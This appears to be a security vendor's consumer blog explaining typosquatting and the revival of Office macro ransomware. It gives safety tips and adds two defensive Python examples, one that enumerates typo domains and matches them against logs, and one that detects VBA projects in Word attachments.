Another type of Typosquat scam results from the person not typing out the full URL, for example google [dot] om rather than google [dot] com. In this instance, the person typing the .om domain would actually be viewing a page hosted under Oman’s Top Level Domain, rather than the usual .com domain. In some instances, large corporations buy up as many associated domains as they can in order to prevent this type of mistake (Google, for example, owns variants of its site containing multiple o’s and different Top Level Domains); however, not all companies have the foresight and/or money to do this.
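The two mistakes described above (a label typo such as a doubled letter, and a clipped TLD such as .om) can be enumerated mechanically, which is how a company decides which look-alike domains to register defensively and how an administrator spots a look-alike in DNS or proxy logs. The following is an added example, not SUPERAntiSpyware code; the protected domain list, the neighbouring-TLD set and the log sample are constructed, and the function assumes plain second-level domains such as name.com.

```python
"""Enumerate single-mistake spellings of a domain (omitted, doubled or swapped
letter, and a neighbouring TLD) and match observed hostnames against them.
Added example; NEARBY_TLDS and the sample log are constructed."""

# TLDs that commonly catch a mistyped ".com" (constructed list, not exhaustive)
NEARBY_TLDS = ("om", "co", "cm", "con", "net", "org")


def typo_variants(domain):
    """Return the set of one-mistake variants of a domain like 'name.com'."""
    label, _, tld = domain.rpartition(".")
    labels = set()
    for i in range(len(label)):                       # omitted letter
        labels.add(label[:i] + label[i + 1:])
    for i in range(len(label)):                       # doubled letter
        labels.add(label[:i + 1] + label[i] + label[i + 1:])
    for i in range(len(label) - 1):                   # adjacent letters swapped
        labels.add(label[:i] + label[i + 1] + label[i] + label[i + 2:])
    variants = {v + "." + tld for v in labels if v}
    for alt in NEARBY_TLDS:                           # same name, e.g. google.om
        if alt != tld:
            variants.add(label + "." + alt)
    variants.discard(domain)                          # the real site is not a typo
    return variants


def find_typosquats(observed_hosts, protected_domains):
    """Map each observed hostname that is a typo of a protected domain to the
    domain it imitates, e.g. when scanning hostnames pulled from a DNS log."""
    lookup = {}
    for good in protected_domains:
        for bad in typo_variants(good):
            lookup[bad] = good
    return {h: lookup[h] for h in observed_hosts if h in lookup}


# Constructed sample of hostnames seen in a log
SEEN = ["superaantispyware.com", "google.om", "google.com",
        "example.org", "gogle.com"]

if __name__ == "__main__":
    print(find_typosquats(SEEN, ["superantispyware.com", "google.com"]))
```

The same variant set is the list a registrar would be asked to check for availability when a business follows tip 6 below.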

It is easy to avoid falling prey to a Typosquatting scam. Here are a few easy things you can do:

1) Never open links in emails from unexpected senders, and exercise caution when visiting sites you’re not familiar with.

2) Bookmark your favorite websites so you can easily access them.

3) Use a search engine like Google, Bing, or Yahoo when looking for a specific website if you are unsure of the spelling, or of whether the business’s website address matches its name. Some car dealerships, for example, use dealer names or slogans as their website address.

4) Double-check the URL you are typing before loading the page.

5) Make sure Real-Time Protection is turned on in SUPERAntiSpyware Professional.

6) If you are starting a web-based business, consider buying multiple domains that are similar to your primary site to preemptively stop Typosquatters. Most domain registrars will offer bulk rates when you purchase more than one domain at a time.

While this type of attack is somewhat uncommon by today’s standards, it still happens every once in a while. By practicing safe browsing habits, keeping your web browsers up-to-date, and running regular scans of your machine, you should not be impacted by most of these types of attacks.

Macros and You: An old attack becomes chic again


Some of the earliest computer viruses and malware were created using macros in Microsoft Office documents. These pieces of malicious code would run once the document was opened, and the infection would happen without the user even being aware that their machine had been compromised. While these types of attacks had fallen out of favor over the years, they’ve come back in style and are more popular than ever before.

What exactly is a macro?

While you’ve probably heard the term thrown around before, most people don’t actually know what macros are or what they’re capable of. In short, macros are little snippets of code that run inside your office software. Many people use macros to speed up repetitive processes, like formatting items. Unfortunately, the same type of code that is used to perform the mundane can also be used to perform the malicious.

Because of the ease of abuse, Microsoft stopped enabling macros automatically many years ago. This is ultimately what led to the majority of these attacks falling by the wayside. Because there was no longer a way to abuse macros on most machines, would-be attackers switched to more traditional executable programs, which are far easier to detect with a normal malware scanner.

With the recent surge in ransomware, would-be attackers needed new methods of delivery. Anti-malware engines had been able to detect many variants, and it was only getting easier, so stealth was needed. What better way to achieve that than to bring back a tried-and-true method: Office macros. Few people expected it, because these infection types hadn’t been seen in years.

The basic attack is carried out like this:

1) An infected person sends you an email with a subject similar to “ATTN: Invoice Attached” that has a Word document attached.

2) You download and open the file, only to see a garbled mess of characters with a notice that says “Enable macro if the data encoding is incorrect” in big bold red letters at the top of the window.

3) The unknowing victim enables macros, thereby running the malicious code.

4) The code sends an email to your Outlook contacts (attempting to infect them), downloads whatever payload(s) it wants, then runs the ransomware (locking your files).
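Step 2 only works if the attachment actually carries a VBA project, and in the modern Word formats (.docx/.docm) that project is a visible part inside a zip container, so a mail filter can tell a macro-carrying attachment from a plain document without opening it. The following is an added example, not SUPERAntiSpyware or Microsoft code; the two documents it builds are constructed stubs rather than real Word files, and it covers the zip-based formats only (the old binary .doc format needs an OLE parser such as oletools’ olevba).

```python
"""Inspect a Word attachment in Office Open XML form (.docx/.docm, a zip
container) for a VBA macro project before anyone opens it.
Added example; the documents built below are constructed stubs."""
import io
import zipfile

MACRO_CONTENT_TYPE = "application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_CONTENT_TYPE = ("application/vnd.openxmlformats-officedocument"
                      ".wordprocessingml.document.main+xml")


def inspect_office_attachment(filename, data):
    """Report whether the bytes are an OOXML zip, whether they hold VBA, and
    whether a .docx extension hides that (a plain .docx should carry no macros)."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            # The VBA project is stored as word/vbaProject.bin inside the zip
            has_vba = any(n.lower().endswith("vbaproject.bin") for n in names)
            if "[Content_Types].xml" in names:
                types_xml = zf.read("[Content_Types].xml").decode("utf-8", "replace")
                has_vba = has_vba or MACRO_CONTENT_TYPE in types_xml
    except zipfile.BadZipFile:
        return {"ooxml": False, "has_vba": False, "extension_mismatch": False}
    ext = filename.rsplit(".", 1)[-1].lower()
    return {"ooxml": True, "has_vba": has_vba,
            "extension_mismatch": has_vba and ext == "docx"}


def _build_doc(with_vba):
    # Minimal constructed stand-in: a zip holding only the parts we inspect
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        main_type = MACRO_CONTENT_TYPE if with_vba else PLAIN_CONTENT_TYPE
        zf.writestr("[Content_Types].xml",
                    f'<Types><Override PartName="/word/document.xml" '
                    f'ContentType="{main_type}"/></Types>')
        zf.writestr("word/document.xml", "<w:document/>")
        if with_vba:
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0 constructed stub")
    return buf.getvalue()


CLEAN_DOC = _build_doc(with_vba=False)
MACRO_DOC = _build_doc(with_vba=True)

if __name__ == "__main__":
    print(inspect_office_attachment("invoice.docx", CLEAN_DOC))
    print(inspect_office_attachment("invoice.docm", MACRO_DOC))
    print(inspect_office_attachment("invoice.docx", MACRO_DOC))  # mismatch
```

An “invoice” that reports has_vba is exactly the case the warning banner in step 2 is trying to talk the reader past, so it is the attachment to hold for review rather than deliver.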

Because of the sharp increase in these types of attacks, Microsoft, SUPERAntiSpyware, and many other security vendors recommend that all users disable macros if they do not need them. While macros should be disabled by default, it is worth double-checking your preferences to ensure that you are protected as well as possible.

For more information on how to disable macros in Office files, please visit this Microsoft Support article.

NOTE: This is a recommendation specifically for home users. If you are in a work environment, please contact your IT department before making any changes!